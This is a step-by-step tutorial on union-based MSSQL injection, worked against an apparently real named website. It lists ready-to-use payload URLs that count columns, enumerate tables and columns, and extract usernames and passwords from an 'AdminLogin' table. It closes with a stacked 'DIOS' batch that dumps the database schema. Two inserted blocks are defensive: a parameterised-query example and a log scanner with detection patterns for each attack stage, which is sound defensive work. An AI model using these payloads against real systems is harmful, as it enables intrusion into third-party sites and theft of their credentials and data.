💉 Union Based MSSQL Injection

Some basic errors in MSSQLi

Error

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][SQL Server Native Client 10.0][SQL Server]Executing SQL directly; no cursor.

Microsoft VBScript runtime error '800a000d' Type mismatch: 'id'

Error Executing Database Query. Line 3: Incorrect syntax near ''.

The text data type cannot be selected as DISTINCT because it is not comparable.

Operand type clash: text is incompatible with int

----------------------------------------------------------------

Step : 1

Put a single quote, then a double quote, after the parameter value and check for an error:


http://aquaservices.co.in/Product.aspx?Id=13'
ERROR

http://aquaservices.co.in/Product.aspx?Id=13"
ERROR

When both the single quote and the double quote give an error, there is a high probability that the injection is integer based.
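As an added illustration, not code from the original post or from the site discussed here: the kind of query construction that produces the Step 1 behaviour (any suffix after the number reaches the database), beside a hardened version that validates the id as an integer and binds it as a parameter, which is what removes this whole class of payloads. The table and column names and the `handle_request` helper are assumptions.

```python
import re

# Hypothetical Product lookup; the table and column names are assumptions.
PRODUCT_SQL = "SELECT Id, Name, Description FROM Product WHERE Id = "


def build_query_vulnerable(raw_id):
    """Concatenates the query-string value straight into the statement, so a
    suffix such as 13' or 13 order by 100-- becomes part of the SQL."""
    return PRODUCT_SQL + raw_id


# Strict integer check: no sign, whitespace, quotes or trailing comment.
INT_ONLY = re.compile(r"[0-9]{1,9}")


def build_query_hardened(raw_id):
    """Validates the value as a plain integer and binds it as a parameter.
    Returns (sql_with_placeholder, params); the driver sends 13 as an int,
    so the 13' / 13" probes and every 'and 0=1 Union All Select' payload
    are rejected before any SQL reaches the server."""
    if not INT_ONLY.fullmatch(raw_id):
        raise ValueError("Id must be a positive integer")
    return PRODUCT_SQL + "?", (int(raw_id),)


def accepts(raw_id):
    """True if the hardened builder would pass the value through."""
    try:
        build_query_hardened(raw_id)
        return True
    except ValueError:
        return False


def handle_request(raw_id, run_query):
    """Handler sketch: reject bad ids with a generic 400 and never echo driver
    text such as the '80040e14' or 'Operand type clash' messages listed above."""
    try:
        sql, params = build_query_hardened(raw_id)
    except ValueError:
        return 400, "Invalid product id"
    try:
        return 200, run_query(sql, params)
    except Exception:
        return 500, "Internal error"
```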

----------------------------------------------------------------

Step : 2

Now we need to know the comment types for MSSQL.

Comment   Name
--        Comment Type 1
--+       Comment Type 2
--+-      SQL Comment
/**/      Inline Comment
;%00      Null Byte

Now let's try the basic -- comment on our target:


http://aquaservices.co.in/Product.aspx?Id=13--
Works fine.

http://aquaservices.co.in/Product.aspx?Id=13 order by 1--
No Error

http://aquaservices.co.in/Product.aspx?Id=13 order by 100--
Here comes the error: The order by position number 100 is out of range of the number of items

Now we continue with order by and eventually find that 8 is the last working column.

----------------------------------------------------------------

Step : 3

Now we use the union select query:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select 1,2,3,4,5,6,7,8--
Again we get an error: Operand type clash: text is incompatible with int

For such errors on a union select statement we have the option of using null in all columns, so let's try that:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select null,null,null,null,null,null,null,null--

Again we get an error: The text data type cannot be selected as DISTINCT because it is not comparable.

Here is one more type of error you can find in MSSQL injection; the solution is simply to use "Union All Select" in place of "Union Select". Let's try:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select null,null,null,null,null,null,null,null--

Again we get an error: Conversion from type 'DBNull' to type 'String' is not valid. Also known as a datatype mismatch error.

The solution for this type of error: here we can see a DBNull-to-String mismatch, so we have to convert each column one by one and see if we can make it work. To put a string in a column we can use single quotes, but I prefer the db_name() function to avoid some errors. Here we have eight columns, so we change each column one by one. The payloads below put db_name() in each of the eight columns in turn:

You can use Burp Suite Intruder to fuzz the payload in place of the columns:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select db_name(),2,3,4,5,6,7,8--
Error: Operand type clash: text is incompatible with int (so it is better to leave this column as int)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,7,8--
Error: Operand type clash: text is incompatible with int (so it is better to leave this column as int)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,db_name(),4,5,6,7,8--
Error: Operand type clash: text is incompatible with int (so it is better to leave this column as int)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,db_name(),5,6,7,8--
Error: Operand type clash: text is incompatible with int (so it is better to leave this column as int)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,db_name(),6,7,8--
Error: Operand type clash: text is incompatible with int (so it is better to leave this column as int)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,db_name(),7,8--
Error: Operand type clash: text is incompatible with int (so it is better to leave this column as int)

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),8--
Here we can see the second column getting printed.

http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),db_name()--
Conversion failed when converting the nvarchar value 'AquaService' to data type bit. (Here we can see the database name in the error.)

----------------------------------------------------------------

Step : 4

Now we can put @@version in place of the vulnerable column to get the current database version:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,@@version,3,4,5,6,db_name(),8--

----------------------------------------------------------------

Step : 5

Now that we have the version, we can get the current database name using db_name():


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,db_name(),8--

---------------------------------------------------------------

There are some other ways to collect more information from MSSQL, given here:

Query/Function                    Output
@@version                         Current Version
user_name()                       Current User
user, system_user, current_user   Current User
db_name()                         Current Database
@@SERVERNAME                      Hostname

----------------------------------------------------------------

Step : 5

Now we will extract the table names. Here the syntax is a little different from MySQL, because MSSQL lacks a LIMIT clause.


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the first table name: AdminLogin
--------------------
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the second table name: Certificate
--------------------
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--

We got the fourth table name: ClientList
--------------------

----------------------------------------------------------------

Step : 6

In the same manner we can get all the tables one by one. Now let's get the columns.

I will extract the columns from the AdminLogin table:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 1 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the first column from the AdminLogin table: IsActive
--------------------
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 2 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the second column from the AdminLogin table: Password
--------------------
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 4 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--

We got the third column from the AdminLogin table: UserName
--------------------

----------------------------------------------------------------

Step : 7

We have the table names and the column names; now let's extract the data from them.

For concatenation we can use %2b, which is the URL-encoded +:


http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,username%2b' '%2bpassword,3,4,5,6,db_name(),8 from AdminLogin--

----------------------------------------------------------------

MSSQL DIOS :

Finally, I would like to show you how to make the whole process a lot faster by using MSSQL DIOS:


http://aquaservices.co.in/Product.aspx?Id=13;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by ZEN :: '%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b  CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into temp_dios_sample END--

It will give an error, but it is actually building the DIOS table, so now let's check the output under temp_dios_sample:

So here we are finished with MSSQL union based injection.
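As an added defensive example, not part of the original post: a small log scanner that recognises each stage of the walkthrough above (the quote probes of Step 1, order by column counting, union all select, information_schema enumeration, and the stacked ;begin declare batch with CHAR()-built tags) in constructed IIS-style log lines. The log format and sample lines are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (date time method uri-stem uri-query status),
# modelled on the request stages in the walkthrough above; not real server logs.
SAMPLE_LOG = """\
2024-01-01 10:00:01 GET /Product.aspx Id=13 200
2024-01-01 10:00:02 GET /Product.aspx Id=13' 500
2024-01-01 10:00:03 GET /Product.aspx Id=13+order+by+100-- 500
2024-01-01 10:00:04 GET /Product.aspx Id=13+and+0%3d1+Union+All+Select+1,2,3,4,5,6,db_name(),8-- 200
2024-01-01 10:00:05 GET /Product.aspx Id=13+and+0%3d1+Union+All+Select+1,table_name,3,4,5,6,db_name(),8+from+(select+top+1+table_name+from+information_schema.tables+order+by+1)+as+t+order+by+1+desc-- 200
2024-01-01 10:00:06 GET /Product.aspx Id=13;begin+declare+%40x+varchar(8000)+SET+%40x=@@version%2bCHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)+END-- 500
"""

# One detector per stage of the walkthrough, applied after URL-decoding and
# lower-casing the query string (so %2b becomes + and %40 becomes @).
STAGES = [
    ("quote_probe",   re.compile(r"^id=\d+['\"]$")),                          # Step 1
    ("column_count",  re.compile(r"\border\s+by\s+\d+\s*--")),                # Step 2
    ("union_select",  re.compile(r"\bunion\s+(all\s+)?select\b")),            # Step 3
    ("schema_enum",   re.compile(r"information_schema\.(tables|columns)")),   # Steps 5-6
    ("stacked_batch", re.compile(r";\s*begin\s+declare\s+@")),                # DIOS batch
    ("char_encoding", re.compile(r"(char\(\d+\)\s*\+\s*){2,}")),              # CHAR()-built tags
]


def classify_query(query):
    """Return the names of every stage whose pattern matches this query string."""
    decoded = unquote_plus(query).lower()
    return [name for name, rx in STAGES if rx.search(decoded)]


def scan_log(text):
    """Return (query, stages) for each line that matches at least one stage."""
    hits = []
    for line in text.splitlines():
        fields = line.split(" ")
        if len(fields) < 6:
            continue
        stages = classify_query(fields[4])
        if stages:
            hits.append((fields[4], stages))
    return hits


def furthest_stage(hits):
    """Latest stage of the walkthrough seen across the hits (None if none)."""
    order = [name for name, _ in STAGES]
    reached = {s for _, stages in hits for s in stages}
    return max(reached, key=order.index) if reached else None
```

A real deployment would feed the decoded query through the same detectors from a SIEM rather than a string literal; the stage ordering gives a simple way to alert on escalation from probing to enumeration.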
